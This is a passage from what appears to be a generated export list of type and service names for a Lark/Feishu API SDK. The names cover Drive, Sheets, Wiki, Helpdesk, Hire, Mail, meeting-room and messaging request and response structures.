UpdateUserPatchReqCustomAttrValueGenericUser, UpdateUserPatchReqCustomAttrValue, UpdateUserPatchReqCustomAttr, UpdateUserPatchReqOrder, UpdateUserPatchReq, UpdateUserPatchRespUserNotificationOption, UpdateUserPatchRespUserCustomAttrValueGenericUser, UpdateUserPatchRespUserCustomAttrValue, UpdateUserPatchRespUserCustomAttr, UpdateUserPatchRespUserOrder, UpdateUserPatchRespUserStatus, UpdateUserPatchRespUserAvatar, UpdateUserPatchRespUser, UpdateUserPatchResp, LarkDriveService, CreateDriveCommentReqReplyListReplyContentElementPerson, CreateDriveCommentReqReplyListReplyContentElementDocsLink, CreateDriveCommentReqReplyListReplyContentElementTextRun, CreateDriveCommentReqReplyListReplyContentElement, CreateDriveCommentReqReplyListReplyContent, CreateDriveCommentReqReplyListReply, CreateDriveCommentReqReplyList, CreateDriveCommentReq, CreateDriveCommentRespReplyListReplyContentElementPerson, CreateDriveCommentRespReplyListReplyContentElementDocsLink, CreateDriveCommentRespReplyListReplyContentElementTextRun, CreateDriveCommentRespReplyListReplyContentElement, CreateDriveCommentRespReplyListReplyContent, CreateDriveCommentRespReplyListReply, CreateDriveCommentRespReplyList, CreateDriveCommentResp, DeleteDriveCommentReq, DeleteDriveCommentResp, GetDriveCommentReq, GetDriveCommentRespReplyListReplyContentElementPerson, GetDriveCommentRespReplyListReplyContentElementDocsLink, GetDriveCommentRespReplyListReplyContentElementTextRun, GetDriveCommentRespReplyListReplyContentElement, GetDriveCommentRespReplyListReplyContent, GetDriveCommentRespReplyListReply, GetDriveCommentRespReplyList, GetDriveCommentResp, GetDriveCommentListReq, GetDriveCommentListRespItemReplyListReplyContentElementPerson, GetDriveCommentListRespItemReplyListReplyContentElementDocsLink, GetDriveCommentListRespItemReplyListReplyContentElementTextRun, GetDriveCommentListRespItemReplyListReplyContentElement, GetDriveCommentListRespItemReplyListReplyContent, GetDriveCommentListRespItemReplyListReply, GetDriveCommentListRespItemReplyList, GetDriveCommentListRespItem, GetDriveCommentListResp, UpdateDriveCommentPatchReq, UpdateDriveCommentPatchResp, UpdateDriveCommentReqContentElementPerson, UpdateDriveCommentReqContentElementDocsLink, UpdateDriveCommentReqContentElementTextRun, UpdateDriveCommentReqContentElement, UpdateDriveCommentReqContent, UpdateDriveCommentReq, UpdateDriveCommentResp, GetDriveDocContentReq, GetDriveDocContentResp, CreateDriveDocReq, CreateDriveDocResp, GetDriveDocMetaReq, GetDriveDocMetaResp, GetDriveDocRawContentReq, GetDriveDocRawContentResp, CopyDriveFileReq, CopyDriveFileResp, CreateDriveFileReq, CreateDriveFileResp, DeleteDriveFileReq, DeleteDriveFileResp, DownloadDriveFileReq, DownloadDriveFileResp, DownloadDriveFileResp, GetDriveFileMetaReqRequestDocs, GetDriveFileMetaReq, GetDriveFileMetaRespDocsMetas, GetDriveFileMetaResp, SearchDriveFileReq, SearchDriveFileRespDocsEntity, SearchDriveFileResp, DeleteDriveSheetFileReq, DeleteDriveSheetFileResp, GetDriveFileStatisticsReq, GetDriveFileStatisticsRespStatistics, GetDriveFileStatisticsResp, UploadDriveFileReq, UploadDriveFileResp, FinishUploadDriveFileReq, FinishUploadDriveFileResp, PartUploadDriveFileReq, PartUploadDriveFileResp, PrepareUploadDriveFileReq, PrepareUploadDriveFileResp, GetDriveFolderChildrenReq, GetDriveFolderChildrenRespChildren, GetDriveFolderChildrenResp, CreateDriveFolderReq, CreateDriveFolderResp, GetDriveFolderMetaReq, GetDriveFolderMetaResp, GetDriveRootFolderMetaReq, GetDriveRootFolderMetaResp, CreateDriveImportTaskReqPoint, CreateDriveImportTaskReq, CreateDriveImportTaskResp, GetDriveImportTaskReq, GetDriveImportTaskRespResult, GetDriveImportTaskResp, BatchGetDriveMediaTmpDownloadURLReq, BatchGetDriveMediaTmpDownloadURLRespTmpDownloadURL, BatchGetDriveMediaTmpDownloadURLResp, DownloadDriveMediaReq, DownloadDriveMediaResp, DownloadDriveMediaResp, UploadDriveMediaReq, UploadDriveMediaResp, FinishUploadDriveMediaReq, FinishUploadDriveMediaResp, PartUploadDriveMediaReq, PartUploadDriveMediaResp, PrepareUploadDriveMediaReq, PrepareUploadDriveMediaResp, CheckDriveMemberPermissionReq, CheckDriveMemberPermissionResp, CreateDriveMemberPermissionReq, CreateDriveMemberPermissionRespMember, CreateDriveMemberPermissionResp, CreateDriveMemberPermissionOldReqMembers, CreateDriveMemberPermissionOldReq, CreateDriveMemberPermissionOldRespFailMembers, CreateDriveMemberPermissionOldResp, DeleteDriveMemberPermissionReq, DeleteDriveMemberPermissionResp, DeleteDriveMemberPermissionOldReq, DeleteDriveMemberPermissionOldResp, GetDriveMemberPermissionListReq, GetDriveMemberPermissionListRespMember, GetDriveMemberPermissionListResp, TransferDriveMemberPermissionReqOwner, TransferDriveMemberPermissionReq, TransferDriveMemberPermissionRespOwner, TransferDriveMemberPermissionResp, UpdateDriveMemberPermissionReq, UpdateDriveMemberPermissionRespMember, UpdateDriveMemberPermissionResp, UpdateDriveMemberPermissionOldReq, UpdateDriveMemberPermissionOldResp, GetDrivePublicPermissionV2Req, GetDrivePublicPermissionV2Resp, UpdateDrivePublicPermissionReq, UpdateDrivePublicPermissionRespPermissionPublic, UpdateDrivePublicPermissionResp, UpdateDrivePublicPermissionV1OldReq, UpdateDrivePublicPermissionV1OldResp, UpdateDrivePublicPermissionV2OldReq, UpdateDrivePublicPermissionV2OldResp, BatchUpdateSheetReqRequestDeleteSheet, BatchUpdateSheetReqRequestCopySheetDestination, BatchUpdateSheetReqRequestCopySheetSource, BatchUpdateSheetReqRequestCopySheet, BatchUpdateSheetReqRequestAddSheetProperties, BatchUpdateSheetReqRequestAddSheet, BatchUpdateSheetReqRequestUpdateSheetPropertiesProtect, BatchUpdateSheetReqRequestUpdateSheetProperties, BatchUpdateSheetReqRequestUpdateSheet, BatchUpdateSheetReqRequest, BatchUpdateSheetReq, BatchUpdateSheetRespReplyDeleteSheet, BatchUpdateSheetRespReplyUpdateSheetPropertiesProtect, BatchUpdateSheetRespReplyUpdateSheetProperties, BatchUpdateSheetRespReplyUpdateSheet, BatchUpdateSheetRespReplyCopySheetProperties, BatchUpdateSheetRespReplyCopySheet, BatchUpdateSheetRespReplyAddSheetProperties, BatchUpdateSheetRespReplyAddSheet, BatchUpdateSheetRespReply, BatchUpdateSheetResp, MergeSheetCellReq, MergeSheetCellResp, UnmergeSheetCellReq, UnmergeSheetCellResp, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatStyleFont, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatStyle, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatAttr, CreateSheetConditionFormatReqSheetConditionFormatConditionFormat, CreateSheetConditionFormatReqSheetConditionFormat, CreateSheetConditionFormatReq, CreateSheetConditionFormatRespResponse, CreateSheetConditionFormatResp, DeleteSheetConditionFormatReqSheetCfIDs, DeleteSheetConditionFormatReq, DeleteSheetConditionFormatRespResponse, DeleteSheetConditionFormatResp, GetSheetConditionFormatReq, GetSheetConditionFormatRespSheetConditionFormatConditionFormatStyleFont, GetSheetConditionFormatRespSheetConditionFormatConditionFormatStyle, GetSheetConditionFormatRespSheetConditionFormatConditionFormat, GetSheetConditionFormatRespSheetConditionFormat, GetSheetConditionFormatResp, UpdateSheetConditionFormatReqSheetConditionFormatsConditionFormatStyleFont, UpdateSheetConditionFormatReqSheetConditionFormatsConditionFormatStyle, UpdateSheetConditionFormatReqSheetConditionFormatsConditionFormatAttr, UpdateSheetConditionFormatReqSheetConditionFormatsConditionFormat, UpdateSheetConditionFormatReqSheetConditionFormats, UpdateSheetConditionFormatReq, UpdateSheetConditionFormatRespResponse, UpdateSheetConditionFormatResp, CreateSheetReq, CreateSheetRespSpreadsheet, CreateSheetResp, CreateSheetDataValidationDropdownReqDataValidationOptions, CreateSheetDataValidationDropdownReqDataValidation, CreateSheetDataValidationDropdownReq, CreateSheetDataValidationDropdownResp, DeleteSheetDataValidationDropdownReqDataValidationRange, DeleteSheetDataValidationDropdownReq, DeleteSheetDataValidationDropdownRespRangeResult, DeleteSheetDataValidationDropdownResp, GetSheetDataValidationDropdownReq, GetSheetDataValidationDropdownRespDataValidationOptions, GetSheetDataValidationDropdownRespDataValidation, GetSheetDataValidationDropdownResp, UpdateSheetDataValidationDropdownReqDataValidationOptions, UpdateSheetDataValidationDropdownReqDataValidation, UpdateSheetDataValidationDropdownReq, UpdateSheetDataValidationDropdownRespDataValidationOptions, UpdateSheetDataValidationDropdownRespDataValidation, UpdateSheetDataValidationDropdownResp, MoveSheetDimensionReqSource, MoveSheetDimensionReq, MoveSheetDimensionResp, AddSheetDimensionRangeReqDimension, AddSheetDimensionRangeReq, AddSheetDimensionRangeResp, DeleteSheetDimensionRangeReqDimension, DeleteSheetDimensionRangeReq, DeleteSheetDimensionRangeResp, InsertSheetDimensionRangeReqDimension, InsertSheetDimensionRangeReq, InsertSheetDimensionRangeResp, UpdateSheetDimensionRangeReqDimensionProperties, UpdateSheetDimensionRangeReqDimension, UpdateSheetDimensionRangeReq, UpdateSheetDimensionRangeResp, CreateSheetFilterReqCondition, CreateSheetFilterReq, CreateSheetFilterResp, DeleteSheetFilterReq, DeleteSheetFilterResp, GetSheetFilterReq, GetSheetFilterRespSheetFilterInfoFilterInfoCondition, GetSheetFilterRespSheetFilterInfoFilterInfo, GetSheetFilterRespSheetFilterInfo, GetSheetFilterResp, UpdateSheetFilterReqCondition, UpdateSheetFilterReq, UpdateSheetFilterResp, CreateSheetFilterViewConditionReq, CreateSheetFilterViewConditionRespCondition, CreateSheetFilterViewConditionResp, DeleteSheetFilterViewConditionReq, DeleteSheetFilterViewConditionResp, GetSheetFilterViewConditionReq, GetSheetFilterViewConditionRespCondition, GetSheetFilterViewConditionResp, QuerySheetFilterViewConditionReq, QuerySheetFilterViewConditionRespItem, QuerySheetFilterViewConditionResp, UpdateSheetFilterViewConditionReq, UpdateSheetFilterViewConditionRespCondition, UpdateSheetFilterViewConditionResp, CreateSheetFilterViewReq, CreateSheetFilterViewRespFilterView, CreateSheetFilterViewResp, DeleteSheetFilterViewReq, DeleteSheetFilterViewResp, GetSheetFilterViewReq, GetSheetFilterViewRespFilterView, GetSheetFilterViewResp, QuerySheetFilterViewReq, QuerySheetFilterViewRespItem, QuerySheetFilterViewResp, UpdateSheetFilterViewReq, UpdateSheetFilterViewRespFilterView, UpdateSheetFilterViewResp, FindSheetReqFindCondition, FindSheetReq, FindSheetRespFindResult, FindSheetResp, CreateSheetFloatImageReq, CreateSheetFloatImageRespFloatImage, CreateSheetFloatImageResp, DeleteSheetFloatImageReq, DeleteSheetFloatImageResp, GetSheetFloatImageReq, GetSheetFloatImageRespFloatImage, GetSheetFloatImageResp, QuerySheetFloatImageReq, QuerySheetFloatImageRespItem, QuerySheetFloatImageResp, UpdateSheetFloatImageReq, UpdateSheetFloatImageRespFloatImage, UpdateSheetFloatImageResp, SetSheetValueImageReq, SetSheetValueImageResp, ImportSheetReq, ImportSheetResp, GetSheetMetaReq, GetSheetMetaRespSheetBlockInfo, GetSheetMetaRespSheetProtectedRangeDimension, GetSheetMetaRespSheetProtectedRange, GetSheetMetaRespSheetMerge, GetSheetMetaRespSheet, GetSheetMetaRespProperties, GetSheetMetaResp, UpdateSheetPropertyReqProperties, UpdateSheetPropertyReq, UpdateSheetPropertyResp, CreateSheetProtectedDimensionReqAddProtectedDimensionDimension, CreateSheetProtectedDimensionReqAddProtectedDimension, CreateSheetProtectedDimensionReq, CreateSheetProtectedDimensionRespAddProtectedDimensionDimension, CreateSheetProtectedDimensionRespAddProtectedDimension, CreateSheetProtectedDimensionResp, DeleteSheetProtectedDimensionReq, DeleteSheetProtectedDimensionResp, GetSheetProtectedDimensionReq, GetSheetProtectedDimensionRespProtectedRangeEditorsUser, GetSheetProtectedDimensionRespProtectedRangeEditors, GetSheetProtectedDimensionRespProtectedRangeDimension, GetSheetProtectedDimensionRespProtectedRange, GetSheetProtectedDimensionResp, UpdateSheetProtectedDimensionReqRequestsEditorsDelEditors, UpdateSheetProtectedDimensionReqRequestsEditorsAddEditors, UpdateSheetProtectedDimensionReqRequestsEditors, UpdateSheetProtectedDimensionReqRequestsDimension, UpdateSheetProtectedDimensionReqRequests, UpdateSheetProtectedDimensionReq, UpdateSheetProtectedDimensionRespReplyEditorsDelEditor, UpdateSheetProtectedDimensionRespReplyEditorsAddEditor, UpdateSheetProtectedDimensionRespReplyEditors, UpdateSheetProtectedDimensionRespReplyDimension, UpdateSheetProtectedDimensionRespReply, UpdateSheetProtectedDimensionResp, ReplaceSheetReqFindCondition, ReplaceSheetReq, ReplaceSheetRespReplaceResult, ReplaceSheetResp, BatchSetSheetStyleReqDataStyleFont, BatchSetSheetStyleReqDataStyle, BatchSetSheetStyleReqData, BatchSetSheetStyleReq, BatchSetSheetStyleRespResponse, BatchSetSheetStyleResp, SetSheetStyleReqAppendStyleStyleFont, SetSheetStyleReqAppendStyleStyle, SetSheetStyleReqAppendStyle, SetSheetStyleReq, SetSheetStyleResp, AppendSheetValueReqValueRange, AppendSheetValueReq, AppendSheetValueRespUpdates, AppendSheetValueResp, BatchGetSheetValueReq, BatchGetSheetValueRespValueRange, BatchGetSheetValueResp, BatchSetSheetValueReqValueRange, BatchSetSheetValueReq, BatchSetSheetValueRespResponse, BatchSetSheetValueResp, GetSheetValueReq, GetSheetValueRespValueRange, GetSheetValueResp, PrependSheetValueReqValueRange, PrependSheetValueReq, PrependSheetValueRespUpdates, PrependSheetValueResp, SetSheetValueReqValueRange, SetSheetValueReq, SetSheetValueResp, MoveDocsToWikiReq, MoveDocsToWikiResp, CreateWikiNodeReq, CreateWikiNodeRespNode, CreateWikiNodeResp, GetWikiNodeReq, GetWikiNodeRespNode, GetWikiNodeResp, GetWikiNodeListReq, GetWikiNodeListRespItem, GetWikiNodeListResp, CreateWikiSpaceReq, CreateWikiSpaceRespSpace, CreateWikiSpaceResp, GetWikiSpaceReq, GetWikiSpaceRespSpace, GetWikiSpaceResp, GetWikiSpaceListReq, GetWikiSpaceListRespItem, GetWikiSpaceListResp, AddWikiSpaceMemberReq, AddWikiSpaceMemberRespMember, AddWikiSpaceMemberResp, UpdateWikiSpaceSettingReq, UpdateWikiSpaceSettingRespSetting, UpdateWikiSpaceSettingResp, LarkEcosystemService, GetEcosystemBindAwemeUserReq, GetEcosystemBindAwemeUserRespAwemeUser, GetEcosystemBindAwemeUserResp, LarkEHRService, DownloadEHRAttachmentsReq, DownloadEHRAttachmentsResp, DownloadEHRAttachmentsResp, GetEHREmployeeListReq, GetEHREmployeeListRespItemCustomField, GetEHREmployeeListRespItemSystemFieldsContractCompany, GetEHREmployeeListRespItemSystemFieldsNativeRegion, GetEHREmployeeListRespItemSystemFieldsWorkLocation, GetEHREmployeeListRespItemSystemFieldsJobLevel, GetEHREmployeeListRespItemSystemFieldsJob, GetEHREmployeeListRespItemSystemFieldsManager, GetEHREmployeeListRespItemSystemFields, GetEHREmployeeListRespItem, GetEHREmployeeListResp, LarkFileService, DownloadFileReq, DownloadFileResp, DownloadFileResp, DownloadImageReq, DownloadImageResp, DownloadImageResp, UploadFileReq, UploadFileResp, UploadImageReq, UploadImageResp, LarkHelpdeskService, GetHelpdeskAgentEmailReq, GetHelpdeskAgentEmailResp, UpdateHelpdeskAgentReq, UpdateHelpdeskAgentResp, CreateHelpdeskAgentScheduleReqAgentScheduleSchedule, CreateHelpdeskAgentScheduleReqAgentSchedule, CreateHelpdeskAgentScheduleReq, CreateHelpdeskAgentScheduleResp, DeleteHelpdeskAgentScheduleReq, DeleteHelpdeskAgentScheduleResp, GetHelpdeskAgentScheduleReq, GetHelpdeskAgentScheduleRespAgentScheduleAgentSkill, GetHelpdeskAgentScheduleRespAgentScheduleSchedule, GetHelpdeskAgentScheduleRespAgentScheduleAgent, GetHelpdeskAgentScheduleRespAgentSchedule, GetHelpdeskAgentScheduleResp, GetHelpdeskAgentScheduleListReq, GetHelpdeskAgentScheduleListRespAgentScheduleAgentSkill, GetHelpdeskAgentScheduleListRespAgentScheduleSchedule, GetHelpdeskAgentScheduleListRespAgentScheduleAgent, GetHelpdeskAgentScheduleListRespAgentSchedule, GetHelpdeskAgentScheduleListResp, UpdateHelpdeskAgentScheduleReqAgentScheduleSchedule, UpdateHelpdeskAgentScheduleReqAgentSchedule, UpdateHelpdeskAgentScheduleReq, UpdateHelpdeskAgentScheduleResp, CreateHelpdeskAgentSkillReqRule, CreateHelpdeskAgentSkillReq, CreateHelpdeskAgentSkillResp, DeleteHelpdeskAgentSkillReq, DeleteHelpdeskAgentSkillResp, GetHelpdeskAgentSkillReq, GetHelpdeskAgentSkillRespAgentSkillAgent, GetHelpdeskAgentSkillRespAgentSkillRule, GetHelpdeskAgentSkillRespAgentSkill, GetHelpdeskAgentSkillResp, GetHelpdeskAgentSkillListReq, GetHelpdeskAgentSkillListRespAgentSkill, GetHelpdeskAgentSkillListResp, GetHelpdeskAgentSkillRuleListReq, GetHelpdeskAgentSkillRuleListRespRule, GetHelpdeskAgentSkillRuleListResp, UpdateHelpdeskAgentSkillReqAgentSkillRules, UpdateHelpdeskAgentSkillReqAgentSkill, UpdateHelpdeskAgentSkillReq, UpdateHelpdeskAgentSkillResp, CreateHelpdeskCategoryReq, CreateHelpdeskCategoryResp, DeleteHelpdeskCategoryReq, DeleteHelpdeskCategoryResp, GetHelpdeskCategoryReq, GetHelpdeskCategoryResp, GetHelpdeskCategoryListReq, GetHelpdeskCategoryListResp, UpdateHelpdeskCategoryReq, UpdateHelpdeskCategoryResp, SubscribeHelpdeskEventReqEvent, SubscribeHelpdeskEventReq, SubscribeHelpdeskEventResp, UnsubscribeHelpdeskEventReqEvent, UnsubscribeHelpdeskEventReq, UnsubscribeHelpdeskEventResp, CreateHelpdeskFAQReqFAQ, CreateHelpdeskFAQReq, CreateHelpdeskFAQRespFAQCreateUser, CreateHelpdeskFAQRespFAQUpdateUser, CreateHelpdeskFAQRespFAQ, CreateHelpdeskFAQResp, DeleteHelpdeskFAQReq, DeleteHelpdeskFAQResp, GetHelpdeskFAQReq, GetHelpdeskFAQRespFAQCreateUser, GetHelpdeskFAQRespFAQUpdateUser, GetHelpdeskFAQRespFAQ, GetHelpdeskFAQResp, GetHelpdeskFAQImageReq, GetHelpdeskFAQImageResp, GetHelpdeskFAQImageResp, GetHelpdeskFAQListReq, GetHelpdeskFAQListRespItemCreateUser, GetHelpdeskFAQListRespItemUpdateUser, GetHelpdeskFAQListRespItem, GetHelpdeskFAQListResp, SearchHelpdeskFAQReq, SearchHelpdeskFAQRespItem, SearchHelpdeskFAQResp, UpdateHelpdeskFAQReqFAQ, UpdateHelpdeskFAQReq, UpdateHelpdeskFAQResp, StartHelpdeskServiceReq, StartHelpdeskServiceResp, AnswerHelpdeskTicketUserQueryReqFAQ, AnswerHelpdeskTicketUserQueryReq, AnswerHelpdeskTicketUserQueryResp, CreateHelpdeskTicketCustomizedFieldReq, CreateHelpdeskTicketCustomizedFieldResp, DeleteHelpdeskTicketCustomizedFieldReq, DeleteHelpdeskTicketCustomizedFieldResp, GetHelpdeskTicketCustomizedFieldReq, GetHelpdeskTicketCustomizedFieldRespUpdatedBy, GetHelpdeskTicketCustomizedFieldRespCreatedBy, GetHelpdeskTicketCustomizedFieldResp, GetHelpdeskTicketCustomizedFieldListReq, GetHelpdeskTicketCustomizedFieldListRespItemUpdatedBy, GetHelpdeskTicketCustomizedFieldListRespItemCreatedBy, GetHelpdeskTicketCustomizedFieldListRespItem, GetHelpdeskTicketCustomizedFieldListResp, UpdateHelpdeskTicketCustomizedFieldReq, UpdateHelpdeskTicketCustomizedFieldResp, GetHelpdeskTicketReq, GetHelpdeskTicketRespTicketCustomizedField, GetHelpdeskTicketRespTicketCollaborator, GetHelpdeskTicketRespTicketClosedBy, GetHelpdeskTicketRespTicketAgent, GetHelpdeskTicketRespTicketGuest, GetHelpdeskTicketRespTicket, GetHelpdeskTicketResp, GetHelpdeskTicketListReq, GetHelpdeskTicketListRespTicketCustomizedField, GetHelpdeskTicketListRespTicketCollaborator, GetHelpdeskTicketListRespTicketClosedBy, GetHelpdeskTicketListRespTicketAgent, GetHelpdeskTicketListRespTicketGuest, GetHelpdeskTicketListRespTicket, GetHelpdeskTicketListResp, DownloadHelpdeskTicketImageReq, DownloadHelpdeskTicketImageResp, DownloadHelpdeskTicketImageResp, GetHelpdeskTicketMessageListReq, GetHelpdeskTicketMessageListRespMessage, GetHelpdeskTicketMessageListResp, SendHelpdeskTicketMessageReq, SendHelpdeskTicketMessageResp, UpdateHelpdeskTicketReqCustomizedField, UpdateHelpdeskTicketReq, UpdateHelpdeskTicketResp, LarkHireService, CreateHireApplicationReq, CreateHireApplicationResp, GetHireApplicationReq, GetHireApplicationRespApplicationStage, GetHireApplicationRespApplication, GetHireApplicationResp, GetHireApplicationInterviewListReq, GetHireApplicationInterviewListRespItemInterviewRecordInterviewScore, GetHireApplicationInterviewListRespItemInterviewRecord, GetHireApplicationInterviewListRespItem, GetHireApplicationInterviewListResp, GetHireApplicationListReq, GetHireApplicationListResp, TerminateHireApplicationReq, TerminateHireApplicationResp, GetHireAttachmentReq, GetHireAttachmentRespAttachment, GetHireAttachmentResp, GetHireAttachmentPreviewReq, GetHireAttachmentPreviewResp, GetHireEmployeeReq, GetHireEmployeeRespEmployee, GetHireEmployeeResp, GetHireEmployeeByApplicationReq, GetHireEmployeeByApplicationRespEmployee, GetHireEmployeeByApplicationResp, UpdateHireEmployeeReqOverboardInfo, UpdateHireEmployeeReqConversionInfo, UpdateHireEmployeeReq, UpdateHireEmployeeRespEmployee, UpdateHireEmployeeResp, GetHireJobReq, GetHireJobRespJobCustomizedDataValueTimeRange, GetHireJobRespJobCustomizedDataValueOptionName, GetHireJobRespJobCustomizedDataValueOption, GetHireJobRespJobCustomizedDataValueOptionName, GetHireJobRespJobCustomizedDataValueOption, GetHireJobRespJobCustomizedDataValue, GetHireJobRespJobCustomizedDataName, GetHireJobRespJobCustomizedData, GetHireJobRespJobJobType, GetHireJobRespJobJobCategory, GetHireJobRespJobHighlight, GetHireJobRespJobMaxJobLevel, GetHireJobRespJobMinJobLevel, GetHireJobRespJobCity, GetHireJobRespJobDepartment, GetHireJobRespJobRecruitmentType, GetHireJobRespJob, GetHireJobResp, GetHireJobManagerReq, GetHireJobManagerRespInfo, GetHireJobManagerResp, GetHireJobProcessListReq, GetHireJobProcessListRespItemStage, GetHireJobProcessListRespItem, GetHireJobProcessListResp, CreateHireNoteReq, CreateHireNoteRespNote, CreateHireNoteResp, GetHireNoteReq, GetHireNoteRespNote, GetHireNoteResp, GetHireNoteListReq, GetHireNoteListRespItem, GetHireNoteListResp, UpdateHireNoteReq, UpdateHireNoteRespNote, UpdateHireNoteResp, GetHireOfferByApplicationReq, GetHireOfferByApplicationRespOfferSalaryPlanCustomizeInfo, GetHireOfferByApplicationRespOfferSalaryPlan, GetHireOfferByApplicationRespOfferBasicInfoCustomizeInfo, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCountry, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressState, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCity, GetHireOfferByApplicationRespOfferBasicInfoWorkAddressDistrict, GetHireOfferByApplicationRespOfferBasicInfoWorkAddress, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCountry, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressState, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCity, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressDistrict, GetHireOfferByApplicationRespOfferBasicInfoOnboardAddress, GetHireOfferByApplicationRespOfferBasicInfoLevel, GetHireOfferByApplicationRespOfferBasicInfoSequence, GetHireOfferByApplicationRespOfferBasicInfoRecruitmentType, GetHireOfferByApplicationRespOfferBasicInfo, GetHireOfferByApplicationRespOffer, GetHireOfferByApplicationResp, GetHireOfferSchemaReq, GetHireOfferSchemaRespObjectOptionName, GetHireOfferSchemaRespObjectOption, GetHireOfferSchemaRespObjectName, GetHireOfferSchemaRespObject, GetHireOfferSchemaResp, GetHireReferralByApplicationReq, GetHireReferralByApplicationRespReferral, GetHireReferralByApplicationResp, GetHireResumeSourceReq, GetHireResumeSourceRespItem, GetHireResumeSourceResp, GetHireTalentReq, GetHireTalentRespTalentInterviewRegistration, GetHireTalentRespTalentResumeSource, GetHireTalentRespTalentSns, GetHireTalentRespTalentLanguage, GetHireTalentRespTalentCertificate, GetHireTalentRespTalentCompetition, GetHireTalentRespTalentAward, GetHireTalentRespTalentWorks, GetHireTalentRespTalentProject, GetHireTalentRespTalentCareer, GetHireTalentRespTalentEducation, GetHireTalentRespTalentBasicInfoPreferredCity, GetHireTalentRespTalentBasicInfoHometownCity, GetHireTalentRespTalentBasicInfoCurrentCity, GetHireTalentRespTalentBasicInfoNationality, GetHireTalentRespTalentBasicInfo, GetHireTalentRespTalent, GetHireTalentResp, MakeHireTransferOnboardByApplicationReq, MakeHireTransferOnboardByApplicationResp, LarkHumanAuthService, CropFaceVerifyImageReq, CropFaceVerifyImageResp, GetFaceVerifyAuthResultReq, GetFaceVerifyAuthResultResp, UploadFaceVerifyImageReq, UploadFaceVerifyImageResp, CreateIdentityReq, CreateIdentityResp, LarkJssdkService, GetJssdkTicketReq, GetJssdkTicketResp, OpenBotReq, OpenBotResp, OpenCalenderReq, OpenCalenderResp, OpenCalenderAccountReq, OpenCalenderAccountResp, OpenCalenderEventCreateReq, OpenCalenderEventCreateResp, OpenCalenderViewReq, OpenCalenderViewResp, OpenChatReq, OpenChatResp, OpenDocsReq, OpenDocsResp, OpenLarkReq, OpenLarkResp, OpenMiniProgramReq, OpenMiniProgramResp, OpenSSOLoginReq, OpenSSOLoginResp, OpenWebAppReq, OpenWebAppResp, OpenWebURLReq, OpenWebURLResp, LarkMailService, CreateMailGroupReq, CreateMailGroupResp, DeleteMailGroupReq, DeleteMailGroupResp, GetMailGroupReq, GetMailGroupResp, GetMailGroupListReq, GetMailGroupListRespItem, GetMailGroupListResp, CreateMailGroupMemberReq, CreateMailGroupMemberResp, DeleteMailGroupMemberReq, DeleteMailGroupMemberResp, GetMailGroupMemberReq, GetMailGroupMemberResp, GetMailGroupMemberListReq, GetMailGroupMemberListRespItem, GetMailGroupMemberListResp, UpdateMailGroupPatchReq, UpdateMailGroupPatchResp, CreateMailGroupPermissionMemberReq, CreateMailGroupPermissionMemberResp, DeleteMailGroupPermissionMemberReq, DeleteMailGroupPermissionMemberResp, GetMailGroupPermissionMemberReq, GetMailGroupPermissionMemberResp, GetMailGroupPermissionMemberListReq, GetMailGroupPermissionMemberListRespItem, GetMailGroupPermissionMemberListResp, UpdateMailGroupReq, UpdateMailGroupResp, CreatePublicMailboxReq, CreatePublicMailboxResp, DeletePublicMailboxReq, DeletePublicMailboxResp, GetPublicMailboxReq, GetPublicMailboxResp, GetPublicMailboxListReq, GetPublicMailboxListRespItem, GetPublicMailboxListResp, ClearPublicMailboxMemberReq, ClearPublicMailboxMemberResp, CreatePublicMailboxMemberReq, CreatePublicMailboxMemberResp, DeletePublicMailboxMemberReq, DeletePublicMailboxMemberResp, GetPublicMailboxMemberReq, GetPublicMailboxMemberResp, GetPublicMailboxMemberListReq, GetPublicMailboxMemberListRespItem, GetPublicMailboxMemberListResp, UpdatePublicMailboxPatchReq, UpdatePublicMailboxPatchResp, UpdatePublicMailboxReq, UpdatePublicMailboxResp, LarkMeetingRoomService, BatchGetMeetingRoomBuildingReq, BatchGetMeetingRoomBuildingRespBuilding, BatchGetMeetingRoomBuildingResp, BatchGetMeetingRoomBuildingIDReq, BatchGetMeetingRoomBuildingIDRespBuilding, BatchGetMeetingRoomBuildingIDResp, CreateMeetingRoomBuildingReq, CreateMeetingRoomBuildingResp, DeleteMeetingRoomBuildingReq, DeleteMeetingRoomBuildingResp, GetMeetingRoomBuildingListReq, GetMeetingRoomBuildingListRespBuilding, GetMeetingRoomBuildingListResp, UpdateMeetingRoomBuildingReq, UpdateMeetingRoomBuildingResp, GetMeetingRoomCountryListReq, GetMeetingRoomCountryListRespCountries, GetMeetingRoomCountryListResp, GetMeetingRoomDistrictListReq, GetMeetingRoomDistrictListRespDistricts, GetMeetingRoomDistrictListResp, BatchGetMeetingRoomFreebusyReq, BatchGetMeetingRoomFreebusyRespFreeBusyRoomIDOrganizerInfo, BatchGetMeetingRoomFreebusyRespFreeBusyRoomID, BatchGetMeetingRoomFreebusyRespFreeBusy, BatchGetMeetingRoomFreebusyResp, ReplyMeetingRoomInstanceReq, ReplyMeetingRoomInstanceResp, BatchGetMeetingRoomRoomReq, BatchGetMeetingRoomRoomRespRoom, BatchGetMeetingRoomRoomResp, BatchGetMeetingRoomRoomIDReq, BatchGetMeetingRoomRoomIDRespRoom, BatchGetMeetingRoomRoomIDResp, CreateMeetingRoomRoomReq, CreateMeetingRoomRoomResp, DeleteMeetingRoomRoomReq, DeleteMeetingRoomRoomResp, GetMeetingRoomRoomListReq, GetMeetingRoomRoomListRespRoom, GetMeetingRoomRoomListResp, UpdateMeetingRoomRoomReq, UpdateMeetingRoomRoomResp, BatchGetMeetingRoomSummaryReqEventUid, BatchGetMeetingRoomSummaryReq, BatchGetMeetingRoomSummaryRespErrorEventUid, BatchGetMeetingRoomSummaryRespEventInfo, BatchGetMeetingRoomSummaryResp, LarkMessageService, BatchDeleteMessageReq, BatchDeleteMessageResp, BatchSendOldRawMessageReq, BatchSendOldRawMessageResp, DeleteMessageReq, DeleteMessageResp, DeleteEphemeralMessageReq, DeleteEphemeralMessageResp, GetMessageReq, GetMessageRespItem, GetMessageResp, GetBatchSentMessageReadUserReq, GetBatchSentMessageReadUserRespReadUser, 